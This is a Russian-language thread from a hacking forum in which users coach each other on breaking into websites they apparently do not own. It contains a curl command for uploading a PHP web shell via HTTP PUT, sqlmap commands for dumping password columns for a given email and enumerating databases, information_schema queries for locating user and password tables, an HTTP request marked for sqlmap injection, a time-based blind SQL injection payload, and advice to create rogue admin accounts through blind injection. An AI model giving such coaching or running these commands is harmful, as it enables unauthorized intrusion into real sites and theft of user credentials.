• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Здарова, кто-нибудь с помощью PUT заливал шеллы?
Есть проблема. При отправке запроса "curl -X PUT -d "$(cat ~/1.php)" https://example.com/shell.php", файл на сервер заливается, но не исполняется. Т.е. я вижу исключительно его содержимое, но то что находится внутри он не исполняет. Пробовал играться с Content-Type, пробовал octet-stream, application/php, text/plain, text/html, пробовал заливаться через .htaccess, тоже не дало результатов. Есть идеи у кого куда можно дальше покопать?
 
подскажите пожалуйста, в админере , можно воспользоватся поиском и найти опеределенную запись в колонке по всей db, что бы понять где она находится какой таблице , колонке. Как это в sqlmap сделать? команда есть такая? Спасибо
 
подскажите пожалуйста, в админере , можно воспользоватся поиском и найти опеределенную запись в колонке по всей db, что бы понять где она находится какой таблице , колонке. Как это в sqlmap сделать? команда есть такая? Спасибо
--search
 
Есть проблема. При отправке запроса "curl -X PUT -d "$(cat ~/1.php)" https://example.com/shell.php", файл на сервер заливается, но не исполняется. Т.е. я вижу исключительно его содержимое, но то что находится внутри он не исполняет. Пробовал играться с Content-Type, пробовал octet-stream, application/php, text/plain, text/html, пробовал заливаться через .htaccess, тоже не дало результатов. Есть идеи у кого куда можно дальше покопать?
А ты уверен что в директории в которую ты грузишь - разрешено выполнять пхп?

пробовал , не хочет искать , или как то нужно запись обозначить , ну если таблица то например -D xx -T user --search, а как строку?
Что значит не хочет искать? Что ты именно пробовал и какую именно ошибку получал? Что бл#ть за формулировка вопроса?
 
пробовал , не хочет искать , или как то нужно запись обозначить , ну если таблица то например -D xx -T user --search, а как строку?
Если надо строку например пас отмыла -D database -T user -C pass --where="email='example@gmail.com'"
А если надо найти конкретную колонку или таблицу тогда -D database --search -T/C
 
А ты уверен что в директории в которую ты грузишь - разрешено выполнять пхп?


Что значит не хочет искать? Что ты именно пробовал и какую именно ошибку получал? Что бл#ть за формулировка вопроса?
так я незнаю какая таблица и колонка , у меня просто есть данные, вот скрин остался что там было
 
так я незнаю какая таблица и колонка , у меня просто есть данные, вот скрин остался что там было
Через --sql-shell запрос (я так думаю) оператор,LIKE, но могу ошибаться
 
Через --sql-shell запрос (я так думаю) оператор,LIKE, но могу ошибаться

MySQL, PostgreSQL, MSSQL - если есть доступ к information_schema
Код:
SELECT table_name, column_name FROM information_schema.columns WHERE table_name LIKE '%users%' ORDER BY table_name, column_name;

если нужно найти колонку:
Код:
WHERE column_name LIKE '%users%'

или сразу двойной поиск:
Код:
SELECT table_name, column_name FROM information_schema.columns WHERE table_name LIKE '%users%' AND COLUMN_NAME LIKE '%pass%';
 
Я из племени хавиджеводов, сейчас пытаюсь стать умнее.
Помогите пожалуйста, вот я получил из burp сообщение о sql-инъекции. Вот он даже выложил отчет. И что делать с этим добром?
Пытался засунуть в sqmapr с запросом -r, он плюется что это manual, ему так не пойдет. В intruder сам черт пока ногу сломит, не очень понимаю пока что это все такое.

GET /news.asp?id=41'&route=ne HTTP/2
Host: site.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: Admin=Referer=%2FDefault%2Easp; ASPSESSIONIDCESQBBTA=LGAPCHDADMOMKADKCIKOPIBO; _ga=GA1.3.609319959.1734897341; _gid=GA1.3.446661255.1734897341; _gat=1
Upgrade-Insecure-Requests: 1
Referer: https://site.com/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
 
Я из племени хавиджеводов, сейчас пытаюсь стать умнее.
Помогите пожалуйста, вот я получил из burp сообщение о sql-инъекции. Вот он даже выложил отчет. И что делать с этим добром?
Пытался засунуть в sqmapr с запросом -r, он плюется что это manual, ему так не пойдет. В intruder сам черт пока ногу сломит, не очень понимаю пока что это все такое.

GET /news.asp?id=41'&route=ne HTTP/2
Host: site.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: Admin=Referer=%2FDefault%2Easp; ASPSESSIONIDCESQBBTA=LGAPCHDADMOMKADKCIKOPIBO; _ga=GA1.3.609319959.1734897341; _gid=GA1.3.446661255.1734897341; _gat=1
Upgrade-Insecure-Requests: 1
Referer: https://site.com/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
строку поменяй в -r когда пихаеш GET /news.asp?id=41*&route=ne HTTP/2 ну или указать -p id вот так в общем
Код:
GET /news.asp?id=41*&route=ne HTTP/2
Host: site.com
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: Admin=Referer=%2FDefault%2Easp; ASPSESSIONIDCESQBBTA=LGAPCHDADMOMKADKCIKOPIBO; _ga=GA1.3.609319959.1734897341; _gid=GA1.3.446661255.1734897341; _gat=1
Upgrade-Insecure-Requests: 1
Referer: https://site.com/
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 0
 
так и сделал, sqlmap сказал вот что WARNING] it appears that you have provided tainted parameter values ('id=41'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
это значит надо отсюда GET /news.asp?id=41*&route=ne HTTP/2 убрать вот это вот 41* и чтоб стало как в родном урле /news.asp?id=5&route=ne ?
 
так и сделал, sqlmap сказал вот что WARNING] it appears that you have provided tainted parameter values ('id=41'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
это значит надо отсюда GET /news.asp?id=41*&route=ne HTTP/2 убрать вот это вот *&route=ne ?
sqlmap --url "https://site.com/news.asp?id=41*&route=ne" --dbs --risk=3 --level=5 --dbms=mysql --random-agent так по пробуй
 
Народ такой вопрос:Есть на сайте SQL иньекция....Когда я делаю тест в том же самом Burp даже при простом запросе '+OR+1=1-- выдает дальше пустую страницу.почему так происходит?Ее там нету и это просто ошибочно выводит? Сканером сколько не проводил тест.показывает,что там есть вот хоть ты убейся(Сканер Burp Suite) и не одна.Значит ложноположительный результат или что не так?Подскажите пожалуйста!
 
Последнее редактирование:
Народ такой вопрос:Есть на сайте SQL иньекция....Когда я делаю тест в том же самом Burp даже при простом запросе '+OR+1=1-- выдает дальше пустую страницу.почему так происходит?Ее там нету и это просто ошибочно выводит? Сканером сколько не проводил тест.показывает,что там есть вот хоть ты убейся(Сканер Burp Suite) и не одна.Значит ложноположительный результат или что не так?Подскажите пожалуйста!
SQLi - они разные бывают, в том числе и "слепые" (blind) ;-)
Ну то есть не обязательно что-то (вся база в идеале :))) вывалится, может наоборот "молчок" произойти.
Яркий классический пример blind SQLi - это когда ты не можешь ничего вынуть в ответ, но можешь забабахать туда insert и создать нового юзера (или даже админа) и зайти им.
 
SQLi - они разные бывают, в том числе и "слепые" (blind) ;-)
Ну то есть не обязательно что-то (вся база в идеале :))) вывалится, может наоборот "молчок" произойти.
Яркий классический пример blind SQLi - это когда ты не можешь ничего вынуть в ответ, но можешь забабахать туда insert и создать нового юзера (или даже админа) и зайти им.
Ага,я кажется тебя понял,но со слепыми будет посложнее думаю,на сколько я знаю!)Так и как мне лучше подойти к этому моменту?
 
Народ такой вопрос:Есть на сайте SQL иньекция....Когда я делаю тест в том же самом Burp даже при простом запросе '+OR+1=1-- выдает дальше пустую страницу.почему так происходит?Ее там нету и это просто ошибочно выводит? Сканером сколько не проводил тест.показывает,что там есть вот хоть ты убейся(Сканер Burp Suite) и не одна.Значит ложноположительный результат или что не так?Подскажите пожалуйста!
 
Ага,я кажется тебя понял,но со слепыми будет посложнее думаю,на сколько я знаю!)Так и как мне лучше подойти к этому моменту?
Слепые SQLi - это самые сложные SQLi, так как по сути тебе надо "угадать" куда упадёт и какой урон и где нанесёт твой снаряд, который ты не видишь он за горизонт далеко падает или за гору.
Это ну как скрытые ендпоинты или файлы искать фаззером (ffuf например) - из той же оперы.
Можно в принципе посоветовать посмотреть что другие ендпоинты возвращают чтобы примерно прикинуть имена таблиц и колонок в таблицах, ну либо перебором. Перебор (вариация - фаззинг) работает и будет работать пока люди мыслят шаблонно, а разрабы - особенно шаблонно, поэтому например обычно есть таблица "users" или "accounts" (и вот врядли "users123" или "accounts456", хотя бывают и префиксы как у WP) в которой есть поля типа "id", "email", "name", "password" или "pass" который обычно хэш (какой хэш? "а вот угадай!" это называется :) ) и т.д. Ну и подумаешь ну заведёшь вслепую ты 10-к или 100-ню "кривых" юзеров, зато 101-й получится админ - им войдёшь и всё поправишь! :)
 
Там где я ковыряю,в принципе вообще все сложно само по себе вот в чем и сложность.Есть еще и XSS(нашел и выявил ее даже),но она я так понял отраженная.Единственное,что у меня там есть так это личный кабинет только и я никому не могу в принципе вообще там написать,что-бы впарить хотя бы,что-то какому нить юзверю,даже админу не могу написать.Есть просто доступ к моему кабинету вот и все!!!Вот в чем заключается сама сложность!Из SQL иньекции у меня есть подсказка в виде запроса '+(select*from(select(sleep(20))) a) +'
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх